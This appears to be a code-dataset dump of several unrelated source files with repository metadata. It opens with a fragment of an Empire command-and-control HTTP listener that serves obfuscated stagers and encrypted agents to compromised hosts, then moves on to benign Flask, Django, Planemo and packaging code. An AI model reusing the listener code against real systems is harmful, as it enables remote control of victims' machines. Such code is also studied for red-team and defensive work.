process, and when the agent requests taskings. 
""" clientIP = request.remote_addr listenerName = self.options['Name']['Value'] message = "[*] GET request for {}/{} from {}".format(request.host, request_uri, clientIP) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) routingPacket = None cookie = request.headers.get('Cookie') if cookie and cookie != '': try: # see if we can extract the 'routing packet' from the specified cookie location # NOTE: this can be easily moved to a paramter, another cookie value, etc. if self.session_cookie in cookie: listenerName = self.options['Name']['Value'] message = "[*] GET cookie value from {} : {}".format(clientIP, cookie) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) cookieParts = cookie.split(';') for part in cookieParts: if part.startswith(self.session_cookie): base64RoutingPacket = part[part.find('=')+1:] # decode the routing packet base64 value in the cookie routingPacket = base64.b64decode(base64RoutingPacket) except Exception as e: routingPacket = None pass if routingPacket: # parse the routing packet and process the results dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions, clientIP) if dataResults and len(dataResults) > 0: for (language, results) in dataResults: if results: if results == 'STAGE0': # handle_agent_data() signals that the listener should return the stager.ps1 code # step 2 of negotiation -> return stager.ps1 (stage 1) listenerName = self.options['Name']['Value'] message = "[*] Sending {} stager (stage 1) to {}".format(language, clientIP) signal = json.dumps({ 'print': True, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) stage = self.generate_stager(language=language, listenerOptions=listenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand) return 
make_response(stage, 200) elif results.startswith('ERROR:'): listenerName = self.options['Name']['Value'] message = "[!] Error from agents.handle_agent_data() for {} from {}: {}".format(request_uri, clientIP, results) signal = json.dumps({ 'print': True, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) if 'not in cache' in results: # signal the client to restage print helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP)) return make_response(self.default_response(), 401) else: return make_response(self.default_response(), 200) else: # actual taskings listenerName = self.options['Name']['Value'] message = "[*] Agent from {} retrieved taskings".format(clientIP) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) return make_response(results, 200) else: # dispatcher.send("[!] Results are None...", sender='listeners/http') return make_response(self.default_response(), 200) else: return make_response(self.default_response(), 200) else: listenerName = self.options['Name']['Value'] message = "[!] {} requested by {} with no routing packet.".format(request_uri, clientIP) signal = json.dumps({ 'print': True, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) return make_response(self.default_response(), 200) @app.route('/<path:request_uri>', methods=['POST']) def handle_post(request_uri): """ Handle an agent POST request. 
""" stagingKey = listenerOptions['StagingKey']['Value'] clientIP = request.remote_addr requestData = request.get_data() listenerName = self.options['Name']['Value'] message = "[*] POST request data length from {} : {}".format(clientIP, len(requestData)) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) # the routing packet should be at the front of the binary request.data # NOTE: this can also go into a cookie/etc. dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP) if dataResults and len(dataResults) > 0: for (language, results) in dataResults: if results: if results.startswith('STAGE2'): # TODO: document the exact results structure returned if ':' in clientIP: clientIP = '[' + str(clientIP) + ']' sessionID = results.split(' ')[1].strip() sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey'] listenerName = self.options['Name']['Value'] message = "[*] Sending agent (stage 2) to {} at {}".format(sessionID, clientIP) signal = json.dumps({ 'print': True, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) hopListenerName = request.headers.get('Hop-Name') try: hopListener = helpers.get_listener_options(hopListenerName) tempListenerOptions = copy.deepcopy(listenerOptions) tempListenerOptions['Host']['Value'] = hopListener['Host']['Value'] except TypeError: tempListenerOptions = listenerOptions # step 6 of negotiation -> server sends patched agent.ps1/agent.py agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand) encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode) # TODO: wrap ^ in a routing packet? 
return make_response(encryptedAgent, 200) elif results[:10].lower().startswith('error') or results[:10].lower().startswith('exception'): listenerName = self.options['Name']['Value'] message = "[!] Error returned for results by {} : {}".format(clientIP, results) signal = json.dumps({ 'print': True, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) return make_response(self.default_response(), 404) elif results == 'VALID': listenerName = self.options['Name']['Value'] message = "[*] Valid results returned by {}".format(clientIP) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) return make_response(self.default_response(), 404) else: return make_response(results, 200) else: return make_response(self.default_response(), 404) else: return make_response(self.default_response(), 404) try: certPath = listenerOptions['CertPath']['Value'] host = listenerOptions['Host']['Value'] if certPath.strip() != '' and host.startswith('https'): certPath = os.path.abspath(certPath) pyversion = sys.version_info # support any version of tls pyversion = sys.version_info if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13: proto = ssl.PROTOCOL_TLS elif pyversion[0] >= 3: proto = ssl.PROTOCOL_TLS else: proto = ssl.PROTOCOL_SSLv23 context = ssl.SSLContext(proto) context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath)) app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context) else: app.run(host=bindIP, port=int(port), threaded=True) except Exception as e: print helpers.color("[!] Listener startup on port %s failed: %s " % (port, e)) listenerName = self.options['Name']['Value'] message = "[!] 
Listener startup on port {} failed: {}".format(port, e) signal = json.dumps({ 'print': True, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) def start(self, name=''): """ Start a threaded instance of self.start_server() and store it in the self.threads dictionary keyed by the listener name. """ listenerOptions = self.options if name and name != '': self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,)) self.threads[name].start() time.sleep(1) # returns True if the listener successfully started, false otherwise return self.threads[name].is_alive() else: name = listenerOptions['Name']['Value'] self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,)) self.threads[name].start() time.sleep(1) # returns True if the listener successfully started, false otherwise return self.threads[name].is_alive() def shutdown(self, name=''): """ Terminates the server thread stored in the self.threads dictionary, keyed by the listener name. """ if name and name != '': print helpers.color("[!] Killing listener '%s'" % (name)) self.threads[name].kill() else: print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])) self.threads[self.options['Name']['Value']].kill() def generate_cookie(self): """ Generate Cookie """ chars = string.letters cookie = helpers.random_string(random.randint(6,16), charset=chars) return cookie
false
true
f705ceaa19f72aa3d963f72c85586a1a32e6de9b
101
py
Python
main.py
onkarsherkar/flask-web-app-tutorail
add0fa67c4c02d93b95c90c61671f02ea1b3d029
[ "MIT" ]
null
null
null
main.py
onkarsherkar/flask-web-app-tutorail
add0fa67c4c02d93b95c90c61671f02ea1b3d029
[ "MIT" ]
null
null
null
main.py
onkarsherkar/flask-web-app-tutorail
add0fa67c4c02d93b95c90c61671f02ea1b3d029
[ "MIT" ]
null
null
null
from website import create_app app = create_app() if __name__== '__main__': app.run(debug=True)
14.428571
30
0.722772
from website import create_app app = create_app() if __name__== '__main__': app.run(debug=True)
true
true
f705cf0495bceae4e5ea4f4df95a6ec02a280af1
3,195
py
Python
tools/src/service/entry_pusher.py
Symthy/blog-index-manager
d0c2e0b265b35be7cdb5aead1f1543f4b0306bdf
[ "MIT" ]
null
null
null
tools/src/service/entry_pusher.py
Symthy/blog-index-manager
d0c2e0b265b35be7cdb5aead1f1543f4b0306bdf
[ "MIT" ]
1
2022-01-29T08:28:36.000Z
2022-01-29T08:28:36.000Z
tools/src/service/entry_pusher.py
Symthy/blog-index-manager
d0c2e0b265b35be7cdb5aead1f1543f4b0306bdf
[ "MIT" ]
null
null
null
from typing import List from blogs.api.interface import IBlogApiExecutor from domain.blog.blog_entry import BlogEntry, BlogEntries from domain.doc.doc_entry import DocEntries, DocEntry from dump.blog_to_doc_mapping import BlogDocEntryMapping from dump.interface import IDumpEntriesAccessor from files.conf.category_group_def import CategoryGroupDef from service.external.blog_entry_index_updater import update_blog_entry_summary_file from service.external.blog_entry_pusher import push_blog_and_photo_entry from service.local.doc_entry_pusher import push_documents_to_docs def push_entry_to_docs_and_blog(api_executor: IBlogApiExecutor, dump_blog_data_accessor: IDumpEntriesAccessor[BlogEntries, BlogEntry], dump_doc_data_accessor: IDumpEntriesAccessor[DocEntries, DocEntry], category_group_def: CategoryGroupDef, is_draft: bool, target_dir_names: List[str] = None): doc_entries = push_documents_to_docs(dump_doc_data_accessor, category_group_def, target_dir_names) if doc_entries is None: return __push_entry_from_docs_to_blog(api_executor, dump_blog_data_accessor, category_group_def, doc_entries, is_draft) def push_entry_from_docs_to_blog(api_executor: IBlogApiExecutor, dump_blog_data_accessor: IDumpEntriesAccessor[BlogEntries, BlogEntry], dump_doc_data_accessor: IDumpEntriesAccessor[DocEntries, DocEntry], category_group_def: CategoryGroupDef, target_doc_entry_ids: List[str], is_draft: bool): doc_entries: DocEntries = dump_doc_data_accessor.load_entries(target_doc_entry_ids) __push_entry_from_docs_to_blog(api_executor, dump_blog_data_accessor, category_group_def, doc_entries, is_draft) def __push_entry_from_docs_to_blog(api_executor: IBlogApiExecutor, dump_blog_data_accessor: IDumpEntriesAccessor[BlogEntries, BlogEntry], category_group_def: CategoryGroupDef, doc_entries: DocEntries, is_draft: bool): blog_doc_mapping = BlogDocEntryMapping() updated_blog_entry_list: List[BlogEntry] = [] for doc_entry in doc_entries.entry_list: blog_entry_id_opt = 
blog_doc_mapping.get_blog_entry_id(doc_entry.id) old_blog_entry_opt = None if blog_entry_id_opt is None else dump_blog_data_accessor.load_entry( blog_entry_id_opt) new_blog_entry_opt = push_blog_and_photo_entry(api_executor, doc_entry, is_draft, old_blog_entry_opt) if new_blog_entry_opt is None: print(f'[Info] blog push skip. (dir: {doc_entry.dir_path})') continue updated_blog_entry_list.append(new_blog_entry_opt) blog_doc_mapping.push_entry_pair(new_blog_entry_opt.id, doc_entry.id) # dump to file updated_blog_entries = BlogEntries(updated_blog_entry_list) dump_blog_data_accessor.save_entries(updated_blog_entries) blog_doc_mapping.dump_file() update_blog_entry_summary_file(dump_blog_data_accessor, category_group_def, updated_blog_entries)
59.166667
116
0.746166
from typing import List from blogs.api.interface import IBlogApiExecutor from domain.blog.blog_entry import BlogEntry, BlogEntries from domain.doc.doc_entry import DocEntries, DocEntry from dump.blog_to_doc_mapping import BlogDocEntryMapping from dump.interface import IDumpEntriesAccessor from files.conf.category_group_def import CategoryGroupDef from service.external.blog_entry_index_updater import update_blog_entry_summary_file from service.external.blog_entry_pusher import push_blog_and_photo_entry from service.local.doc_entry_pusher import push_documents_to_docs def push_entry_to_docs_and_blog(api_executor: IBlogApiExecutor, dump_blog_data_accessor: IDumpEntriesAccessor[BlogEntries, BlogEntry], dump_doc_data_accessor: IDumpEntriesAccessor[DocEntries, DocEntry], category_group_def: CategoryGroupDef, is_draft: bool, target_dir_names: List[str] = None): doc_entries = push_documents_to_docs(dump_doc_data_accessor, category_group_def, target_dir_names) if doc_entries is None: return __push_entry_from_docs_to_blog(api_executor, dump_blog_data_accessor, category_group_def, doc_entries, is_draft) def push_entry_from_docs_to_blog(api_executor: IBlogApiExecutor, dump_blog_data_accessor: IDumpEntriesAccessor[BlogEntries, BlogEntry], dump_doc_data_accessor: IDumpEntriesAccessor[DocEntries, DocEntry], category_group_def: CategoryGroupDef, target_doc_entry_ids: List[str], is_draft: bool): doc_entries: DocEntries = dump_doc_data_accessor.load_entries(target_doc_entry_ids) __push_entry_from_docs_to_blog(api_executor, dump_blog_data_accessor, category_group_def, doc_entries, is_draft) def __push_entry_from_docs_to_blog(api_executor: IBlogApiExecutor, dump_blog_data_accessor: IDumpEntriesAccessor[BlogEntries, BlogEntry], category_group_def: CategoryGroupDef, doc_entries: DocEntries, is_draft: bool): blog_doc_mapping = BlogDocEntryMapping() updated_blog_entry_list: List[BlogEntry] = [] for doc_entry in doc_entries.entry_list: blog_entry_id_opt = 
blog_doc_mapping.get_blog_entry_id(doc_entry.id) old_blog_entry_opt = None if blog_entry_id_opt is None else dump_blog_data_accessor.load_entry( blog_entry_id_opt) new_blog_entry_opt = push_blog_and_photo_entry(api_executor, doc_entry, is_draft, old_blog_entry_opt) if new_blog_entry_opt is None: print(f'[Info] blog push skip. (dir: {doc_entry.dir_path})') continue updated_blog_entry_list.append(new_blog_entry_opt) blog_doc_mapping.push_entry_pair(new_blog_entry_opt.id, doc_entry.id) updated_blog_entries = BlogEntries(updated_blog_entry_list) dump_blog_data_accessor.save_entries(updated_blog_entries) blog_doc_mapping.dump_file() update_blog_entry_summary_file(dump_blog_data_accessor, category_group_def, updated_blog_entries)
true
true
f705d15166e8684268640b17b721182297f2ea28
330
py
Python
bluebottle/cms/migrations/0015_merge_20161219_0946.py
terrameijar/bluebottle
b4f5ba9c4f03e678fdd36091b29240307ea69ffd
[ "BSD-3-Clause" ]
10
2015-05-28T18:26:40.000Z
2021-09-06T10:07:03.000Z
bluebottle/cms/migrations/0015_merge_20161219_0946.py
terrameijar/bluebottle
b4f5ba9c4f03e678fdd36091b29240307ea69ffd
[ "BSD-3-Clause" ]
762
2015-01-15T10:00:59.000Z
2022-03-31T15:35:14.000Z
bluebottle/cms/migrations/0015_merge_20161219_0946.py
terrameijar/bluebottle
b4f5ba9c4f03e678fdd36091b29240307ea69ffd
[ "BSD-3-Clause" ]
9
2015-02-20T13:19:30.000Z
2022-03-08T14:09:17.000Z
# -*- coding: utf-8 -*- # Generated by Django 1.10.2 on 2016-12-19 08:46 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('cms', '0014_auto_20161216_1359'), ('cms', '0014_auto_20161216_1424'), ] operations = [ ]
19.411765
48
0.654545
from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('cms', '0014_auto_20161216_1359'), ('cms', '0014_auto_20161216_1424'), ] operations = [ ]
true
true
f705d1668beb8e7029c97be27c6db88af67d97b3
4,213
py
Python
planemo/galaxy/api.py
pvanheus/planemo
12c4256325bb1b274dcd40d64b91c1f832cf49b1
[ "CC-BY-3.0" ]
null
null
null
planemo/galaxy/api.py
pvanheus/planemo
12c4256325bb1b274dcd40d64b91c1f832cf49b1
[ "CC-BY-3.0" ]
1
2016-09-14T18:09:59.000Z
2016-09-14T18:09:59.000Z
planemo/galaxy/api.py
jmchilton/planemo
d352a085fe10cb6b7c1384663b114201da42d97b
[ "CC-BY-3.0" ]
null
null
null
"""A high-level interface to local Galaxy instances using bioblend.""" from six import StringIO from planemo.bioblend import ensure_module from planemo.bioblend import galaxy DEFAULT_MASTER_API_KEY = "test_key" def gi(port=None, url=None, key=None): """Return a bioblend ``GalaxyInstance`` for Galaxy on this port.""" ensure_module() if key is None: key = DEFAULT_MASTER_API_KEY if port is None: url = url else: url = "http://localhost:%d" % int(port) return galaxy.GalaxyInstance( url=url, key=key ) def user_api_key(admin_gi): """Use an admin authenticated account to generate a user API key.""" ensure_module() # TODO: thread-safe users = admin_gi.users all_users = users.get_users() user_id = None for user in all_users: if user["email"] == "planemo@galaxyproject.org": user_id = user["id"] if user_id is None: # TODO: Allow override with --user_api_key. galaxy_config = admin_gi.config.get_config() use_remote_user = bool(galaxy_config["use_remote_user"]) if not use_remote_user: user_response = users.create_local_user( "planemo", "planemo@galaxyproject.org", "planemo", ) user_id = user_response["id"] else: user_response = users.create_remote_user( "planemo@galaxyproject.org", ) user_id = user_response["id"] return users.create_user_apikey(user_id) def summarize_history(ctx, gi, history_id): """Summarize a history with print() based on similar code in Galaxy for populators. 
""" if not ctx.verbose: return if history_id is None: raise ValueError("summarize_history passed empty history_id") try: history_contents = gi.histories.show_history(history_id, contents=True) except Exception: print("Failed to fetch history contents in summarize_history.") return for history_content in history_contents: history_content_id = history_content.get('id', None) print("| %d - %s (HID - NAME) " % (int(history_content['hid']), history_content['name'])) if history_content['history_content_type'] == 'dataset_collection': history_contents_json = gi.histories.show_dataset_collection(history_id, history_content["id"]) print("| Dataset Collection: %s" % history_contents_json) continue try: dataset_info = gi.histories.show_dataset(history_id, history_content_id) print("| Dataset State:") print(_format_for_summary(dataset_info.get("state"), "Dataset state is unknown.")) print("| Dataset Blurb:") print(_format_for_summary(dataset_info.get("misc_blurb", ""), "Dataset blurb was empty.")) print("| Dataset Info:") print(_format_for_summary(dataset_info.get("misc_info", ""), "Dataset info is empty.")) print("| Peek:") print(_format_for_summary(dataset_info.get("peek", ""), "Peek unavilable.")) except Exception: print("| *PLANEMO ERROR FETCHING DATASET DETAILS*") try: provenance_info = _dataset_provenance(gi, history_id, history_content_id) print("| Dataset Job Standard Output:") print(_format_for_summary(provenance_info.get("stdout", ""), "Standard output was empty.")) print("| Dataset Job Standard Error:") print(_format_for_summary(provenance_info.get("stderr", ""), "Standard error was empty.")) except Exception: print("| *PLANEMO ERROR FETCHING JOB DETAILS*") print("|") def _format_for_summary(blob, empty_message, prefix="| "): contents = "\n".join(["%s%s" % (prefix, line.strip()) for line in StringIO(blob).readlines() if line.rstrip("\n\r")]) return contents or "%s*%s*" % (prefix, empty_message) def _dataset_provenance(gi, history_id, id): provenance = 
gi.histories.show_dataset_provenance(history_id, id) return provenance __all__ = ( "DEFAULT_MASTER_API_KEY", "gi", "user_api_key", )
36.318966
121
0.635652
from six import StringIO from planemo.bioblend import ensure_module from planemo.bioblend import galaxy DEFAULT_MASTER_API_KEY = "test_key" def gi(port=None, url=None, key=None): ensure_module() if key is None: key = DEFAULT_MASTER_API_KEY if port is None: url = url else: url = "http://localhost:%d" % int(port) return galaxy.GalaxyInstance( url=url, key=key ) def user_api_key(admin_gi): ensure_module() users = admin_gi.users all_users = users.get_users() user_id = None for user in all_users: if user["email"] == "planemo@galaxyproject.org": user_id = user["id"] if user_id is None: galaxy_config = admin_gi.config.get_config() use_remote_user = bool(galaxy_config["use_remote_user"]) if not use_remote_user: user_response = users.create_local_user( "planemo", "planemo@galaxyproject.org", "planemo", ) user_id = user_response["id"] else: user_response = users.create_remote_user( "planemo@galaxyproject.org", ) user_id = user_response["id"] return users.create_user_apikey(user_id) def summarize_history(ctx, gi, history_id): if not ctx.verbose: return if history_id is None: raise ValueError("summarize_history passed empty history_id") try: history_contents = gi.histories.show_history(history_id, contents=True) except Exception: print("Failed to fetch history contents in summarize_history.") return for history_content in history_contents: history_content_id = history_content.get('id', None) print("| %d - %s (HID - NAME) " % (int(history_content['hid']), history_content['name'])) if history_content['history_content_type'] == 'dataset_collection': history_contents_json = gi.histories.show_dataset_collection(history_id, history_content["id"]) print("| Dataset Collection: %s" % history_contents_json) continue try: dataset_info = gi.histories.show_dataset(history_id, history_content_id) print("| Dataset State:") print(_format_for_summary(dataset_info.get("state"), "Dataset state is unknown.")) print("| Dataset Blurb:") print(_format_for_summary(dataset_info.get("misc_blurb", ""), 
"Dataset blurb was empty.")) print("| Dataset Info:") print(_format_for_summary(dataset_info.get("misc_info", ""), "Dataset info is empty.")) print("| Peek:") print(_format_for_summary(dataset_info.get("peek", ""), "Peek unavilable.")) except Exception: print("| *PLANEMO ERROR FETCHING DATASET DETAILS*") try: provenance_info = _dataset_provenance(gi, history_id, history_content_id) print("| Dataset Job Standard Output:") print(_format_for_summary(provenance_info.get("stdout", ""), "Standard output was empty.")) print("| Dataset Job Standard Error:") print(_format_for_summary(provenance_info.get("stderr", ""), "Standard error was empty.")) except Exception: print("| *PLANEMO ERROR FETCHING JOB DETAILS*") print("|") def _format_for_summary(blob, empty_message, prefix="| "): contents = "\n".join(["%s%s" % (prefix, line.strip()) for line in StringIO(blob).readlines() if line.rstrip("\n\r")]) return contents or "%s*%s*" % (prefix, empty_message) def _dataset_provenance(gi, history_id, id): provenance = gi.histories.show_dataset_provenance(history_id, id) return provenance __all__ = ( "DEFAULT_MASTER_API_KEY", "gi", "user_api_key", )
true
true
f705d2280b305e92ead506194e8bf7b9a79b98f6
2,143
py
Python
setup.py
chowmean/DBSheet
3f1c521320cb3564c4ff55cd70c8a1978dd32a4c
[ "Apache-2.0" ]
3
2017-08-18T20:04:12.000Z
2021-01-08T12:23:43.000Z
setup.py
chowmean/DBSheet
3f1c521320cb3564c4ff55cd70c8a1978dd32a4c
[ "Apache-2.0" ]
1
2021-06-01T23:13:57.000Z
2021-06-01T23:13:57.000Z
setup.py
chowmean/DBSheet
3f1c521320cb3564c4ff55cd70c8a1978dd32a4c
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python # # Python installation script # Author - @chowmean from __future__ import print_function import os.path import sys import setuptools # Project variables VER_PROP_FILE = os.path.join(os.path.dirname(__file__), 'version.properties') REQUIREMENTS_FILE = os.path.join(os.path.dirname(__file__), 'requirements.txt') CLASSIFIERS = [ "Programming Language :: Python", "Operating System :: OS Independent", "Intended Audience :: Developers", "Development Status :: 4 - Beta", "Environment :: Plugins", "Topic :: Software Development :: Libraries :: Python Modules", "License :: Other/Proprietary License", "Natural Language :: English", ] # Read version properties file and extract version number. def get_version(): version = "0.1.4" try: with open(VER_PROP_FILE) as f: for line in f.readlines(): if line.startswith("version="): version = line.lstrip('version=').strip() break except IOError as ioe: print(ioe, file=sys.stderr) return version # Read requirements.txt file and extract the list of dependency. def get_install_requirements(): # read requirements requires = [] try: with open(REQUIREMENTS_FILE) as f: requires = list(map(lambda l: l.strip(), f.readlines())) except IOError as ioe: print(ioe, file=sys.stderr) sys.exit(1) return requires if __name__ == '__main__': with open('README.md', 'r') as f: readme = f.read() setuptools.setup( name="db_sheet", version=get_version(), description="db_sheet: Using Google Spreadsheets as Database.", author="chowmean", author_email="gaurav.dev.iiitm@gmail.com", url="https://github.com/chowmean/DBSheet", keywords=["DBSheet, db_sheet, google spreadsheets. excel"], install_requires=get_install_requirements(), packages=["db_sheet", ], classifiers=CLASSIFIERS, long_description=readme, long_description_content_type="text/markdown", license="Apache-2.0" )
29.763889
79
0.643957
from __future__ import print_function import os.path import sys import setuptools VER_PROP_FILE = os.path.join(os.path.dirname(__file__), 'version.properties') REQUIREMENTS_FILE = os.path.join(os.path.dirname(__file__), 'requirements.txt') CLASSIFIERS = [ "Programming Language :: Python", "Operating System :: OS Independent", "Intended Audience :: Developers", "Development Status :: 4 - Beta", "Environment :: Plugins", "Topic :: Software Development :: Libraries :: Python Modules", "License :: Other/Proprietary License", "Natural Language :: English", ] def get_version(): version = "0.1.4" try: with open(VER_PROP_FILE) as f: for line in f.readlines(): if line.startswith("version="): version = line.lstrip('version=').strip() break except IOError as ioe: print(ioe, file=sys.stderr) return version def get_install_requirements(): requires = [] try: with open(REQUIREMENTS_FILE) as f: requires = list(map(lambda l: l.strip(), f.readlines())) except IOError as ioe: print(ioe, file=sys.stderr) sys.exit(1) return requires if __name__ == '__main__': with open('README.md', 'r') as f: readme = f.read() setuptools.setup( name="db_sheet", version=get_version(), description="db_sheet: Using Google Spreadsheets as Database.", author="chowmean", author_email="gaurav.dev.iiitm@gmail.com", url="https://github.com/chowmean/DBSheet", keywords=["DBSheet, db_sheet, google spreadsheets. excel"], install_requires=get_install_requirements(), packages=["db_sheet", ], classifiers=CLASSIFIERS, long_description=readme, long_description_content_type="text/markdown", license="Apache-2.0" )
true
true
f705d35f606de1dd5f2d3137aa565c331846f652
5,403
py
Python
djangoratings/managers.py
adw0rd/django-ratings
941048e05a14bb997966fe1d4e8fd638ee66d76f
[ "BSD-2-Clause" ]
1
2021-04-29T11:19:47.000Z
2021-04-29T11:19:47.000Z
djangoratings/managers.py
adw0rd/django-ratings
941048e05a14bb997966fe1d4e8fd638ee66d76f
[ "BSD-2-Clause" ]
null
null
null
djangoratings/managers.py
adw0rd/django-ratings
941048e05a14bb997966fe1d4e8fd638ee66d76f
[ "BSD-2-Clause" ]
null
null
null
from django.db.models import Manager from django.db.models.query import QuerySet from django.contrib.contenttypes.models import ContentType import itertools class VoteQuerySet(QuerySet): def delete(self, *args, **kwargs): """Handles updating the related `votes` and `score` fields attached to the model.""" # XXX: circular import from fields import RatingField qs = self.distinct().values_list('content_type', 'object_id').order_by('content_type') to_update = [] for content_type, objects in itertools.groupby(qs, key=lambda x: x[0]): model_class = ContentType.objects.get(pk=content_type).model_class() if model_class: to_update.extend(list(model_class.objects.filter(pk__in=list(objects)[0]))) retval = super(VoteQuerySet, self).delete(*args, **kwargs) # TODO: this could be improved for obj in to_update: for field in getattr(obj, '_djangoratings', []): getattr(obj, field.name)._update(commit=False) obj.save() return retval class VoteManager(Manager): def get_query_set(self): return VoteQuerySet(self.model) def get_for_user_in_bulk(self, objects, user): objects = list(objects) if len(objects) > 0: ctype = ContentType.objects.get_for_model(objects[0]) votes = list(self.filter(content_type__pk=ctype.id, object_id__in=[obj._get_pk_val() \ for obj in objects], user__pk=user.id)) vote_dict = dict([(vote.object_id, vote) for vote in votes]) else: vote_dict = {} return vote_dict class SimilarUserManager(Manager): def get_recommendations(self, user, model_class, min_score=1): from djangoratings.models import Vote, IgnoredObject content_type = ContentType.objects.get_for_model(model_class) params = dict( v=Vote._meta.db_table, sm=self.model._meta.db_table, m=model_class._meta.db_table, io=IgnoredObject._meta.db_table, ) objects = model_class._default_manager.extra( tables=[params['v']], where=[ '%(v)s.object_id = %(m)s.id and %(v)s.content_type_id = %%s' % params, '%(v)s.user_id IN (select to_user_id from %(sm)s where from_user_id = %%s and exclude = 0)' % params, '%(v)s.score >= 
%%s' % params, # Exclude already rated maps '%(v)s.object_id NOT IN (select object_id from %(v)s where content_type_id = %(v)s.content_type_id and user_id = %%s)' % params, # IgnoredObject exclusions '%(v)s.object_id NOT IN (select object_id from %(io)s where content_type_id = %(v)s.content_type_id and user_id = %%s)' % params, ], params=[content_type.id, user.id, min_score, user.id, user.id] ).distinct() # objects = model_class._default_manager.filter(pk__in=content_type.votes.extra( # where=['user_id IN (select to_user_id from %s where from_user_id = %d and exclude = 0)' % (self.model._meta.db_table, user.pk)], # ).filter(score__gte=min_score).exclude( # object_id__in=IgnoredObject.objects.filter(content_type=content_type, user=user).values_list('object_id', flat=True), # ).exclude( # object_id__in=Vote.objects.filter(content_type=content_type, user=user).values_list('object_id', flat=True) # ).distinct().values_list('object_id', flat=True)) return objects def update_recommendations(self): # TODO: this is mysql only atm # TODO: this doesnt handle scores that have multiple values (e.g. 10 points, 5 stars) # due to it calling an agreement as score = score. We need to loop each rating instance # and express the condition based on the range. 
from djangoratings.models import Vote from django.db import connection, DatabaseError cursor = connection.cursor() cursor.execute('BEGIN') try: cursor.execute('TRUNCATE TABLE %s' % (self.model._meta.db_table,)) except DatabaseError: cursor.execute('DELETE FROM %s' % (self.model._meta.db_table,)) cursor.execute("""INSERT INTO %(t1)s (to_user_id, from_user_id, agrees, disagrees, exclude) SELECT v1.user_id, v2.user_id, SUM(if(v2.score = v1.score, 1, 0)) AS agrees, SUM(if(v2.score != v1.score, 1, 0)) AS disagrees, 0 FROM %(t2)s AS v1 INNER JOIN %(t2)s AS v2 ON v1.user_id != v2.user_id AND v1.object_id = v2.object_id AND v1.content_type_id = v2.content_type_id WHERE v1.user_id is not null AND v2.user_id is not null GROUP BY v1.user_id, v2.user_id HAVING agrees / (disagrees + 0.0001) > 3 ON DUPLICATE KEY UPDATE agrees=values(agrees), disagrees=values(disagrees);""" % dict( t1=self.model._meta.db_table, t2=Vote._meta.db_table, )) cursor.execute('commit') cursor.close()
45.403361
145
0.594855
from django.db.models import Manager from django.db.models.query import QuerySet from django.contrib.contenttypes.models import ContentType import itertools class VoteQuerySet(QuerySet): def delete(self, *args, **kwargs): from fields import RatingField qs = self.distinct().values_list('content_type', 'object_id').order_by('content_type') to_update = [] for content_type, objects in itertools.groupby(qs, key=lambda x: x[0]): model_class = ContentType.objects.get(pk=content_type).model_class() if model_class: to_update.extend(list(model_class.objects.filter(pk__in=list(objects)[0]))) retval = super(VoteQuerySet, self).delete(*args, **kwargs) for obj in to_update: for field in getattr(obj, '_djangoratings', []): getattr(obj, field.name)._update(commit=False) obj.save() return retval class VoteManager(Manager): def get_query_set(self): return VoteQuerySet(self.model) def get_for_user_in_bulk(self, objects, user): objects = list(objects) if len(objects) > 0: ctype = ContentType.objects.get_for_model(objects[0]) votes = list(self.filter(content_type__pk=ctype.id, object_id__in=[obj._get_pk_val() \ for obj in objects], user__pk=user.id)) vote_dict = dict([(vote.object_id, vote) for vote in votes]) else: vote_dict = {} return vote_dict class SimilarUserManager(Manager): def get_recommendations(self, user, model_class, min_score=1): from djangoratings.models import Vote, IgnoredObject content_type = ContentType.objects.get_for_model(model_class) params = dict( v=Vote._meta.db_table, sm=self.model._meta.db_table, m=model_class._meta.db_table, io=IgnoredObject._meta.db_table, ) objects = model_class._default_manager.extra( tables=[params['v']], where=[ '%(v)s.object_id = %(m)s.id and %(v)s.content_type_id = %%s' % params, '%(v)s.user_id IN (select to_user_id from %(sm)s where from_user_id = %%s and exclude = 0)' % params, '%(v)s.score >= %%s' % params, '%(v)s.object_id NOT IN (select object_id from %(v)s where content_type_id = %(v)s.content_type_id and user_id = %%s)' % 
